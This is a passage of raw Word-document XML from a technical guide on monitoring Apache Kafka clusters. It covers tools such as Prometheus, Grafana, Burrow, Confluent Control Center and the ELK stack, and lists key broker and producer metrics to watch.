    <w:p w14:paraId="2824C612" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Allows managing multiple Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF6147" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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vides visibility into cluster health and performance metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3B83D" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Helps track consumer group offsets and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FAEAA" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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You can set it up by following the installation and configuration steps on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="0003272F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Kafka Manager GitHub repository</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC7391" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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3. Using Prometheus and Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A6A46" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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metheus and Grafana are popular open-source tools for monitoring and alerting. You can integrate them with Kafka to collect and visualize metrics in a more advanced manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BEF26" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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lastRenderedPageBreak/>
        <w:t>Prometheus Kafka Exporter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C257FA" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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afka Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Prometheus exporter that pulls metrics from Kafka brokers and exposes them in a Prometheus-compatible format. It gathers Kafka metrics through JMX and exports them to Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5DD1F" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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You can deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Kafka Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your Kafka cluster to collect data, and then use Prometheus to scrape those metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0DD28" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Grafana Dashboards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C611AC8" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Once the metrics are collected by Prometheus, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to visualize and monitor Kafka’s health in real-time. Grafana offers predefined dashboards for Kafka, which display various metrics like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D1691" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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Broker status and partition replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C677D16" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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sumer lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936889D" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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roughput (bytes/requests per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23BDC9" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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Request and error rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12349E31" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Grafana can be used to set up alerts based on defined thresholds, enabling proactive monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A56CEF" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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4. Using Burrow for Consumer Lag Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050C9F7" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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urrow</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source tool designed specifically for monitoring Kafka consumer lag. It tracks the lag between Kafka consumers and partitions in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660EAF6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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urrow Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22BE4D" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Real-time consumer lag tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB6F21" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Alerting for consumer lag exceeding a certain threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13390C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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vides API access for integration into other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65808F6C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Burrow can be configured to monitor Kafka consumer lag, helping ensure that consumers are processing messages efficiently without falling behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B0B10" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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5. Using Kafka’s Built-in Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B41CB6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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provides several built-in tools to monitor cluster performance and health:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE38ED" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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afka Tool (kafka-topics.sh, kafka-consumer-groups.sh, kafka-broker-api-versions.sh)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AA886" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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topics.sh: Get the list of topics, partitions, and replication status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26400103" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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consumer-groups.sh: Check consumer group status and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00738BF6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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broker-api-versions.sh: Check the API versions supported by each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD14DC" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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ese tools can be used for on-demand checks and troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A63A7A" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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6. Using Confluent Control Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E37C2" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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If you are using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a commercial distribution of Kafka), </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Control Center</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a rich, web-based interface to monitor Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DD45C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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fluent Control Center Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8A0D1" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Monitor topics, brokers, and consumers in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E5222" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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rack consumer lag and message throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1C4E1" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Visualize partition distribution and replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AAE678" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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7. System Monitoring Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5877AA" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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brokers run as regular processes on servers, so you can also use system-level monitoring tools to track the health of the underlying hardware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF38828" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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etrics to Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB2061" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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PU and Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor CPU and memory usage on each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5E569" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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isk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka relies heavily on disk I/O for storing logs, so monitor disk usage, throughput, and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE9B28" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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Network Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the network traffic between Kafka brokers, producers, and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222EEE0" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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ools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Node Exporter</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Collectd</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be integrated to monitor these system-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132F1B0" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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8. Logging and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6ED430" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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provides detailed logging for each broker, which can be analyzed using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash, and Kibana)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for further analysis and visualization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF1AF8" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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ogstash</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to aggregate logs from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A544A" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores the logs and allows you to query and analyze them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A907D91" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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ibana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a web interface to visualize and explore log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DDF9F" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Set up alerts based on Kafka log patterns to quickly respond to errors or anomalies in the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE89639" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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ey Metrics to Monitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD80323" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD4E6C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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MessagesInPerSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6770E" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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lastRenderedPageBreak/>
        <w:t>BytesInPerSec, BytesOutPerSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B020430" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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UnderReplicatedPartitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776796CD" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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RequestHandlerAvgIdlePercent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C112FDB" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roducer Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A65C84A" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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duceRequestsPerSecond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC18FA8" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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RequestSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0F288" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
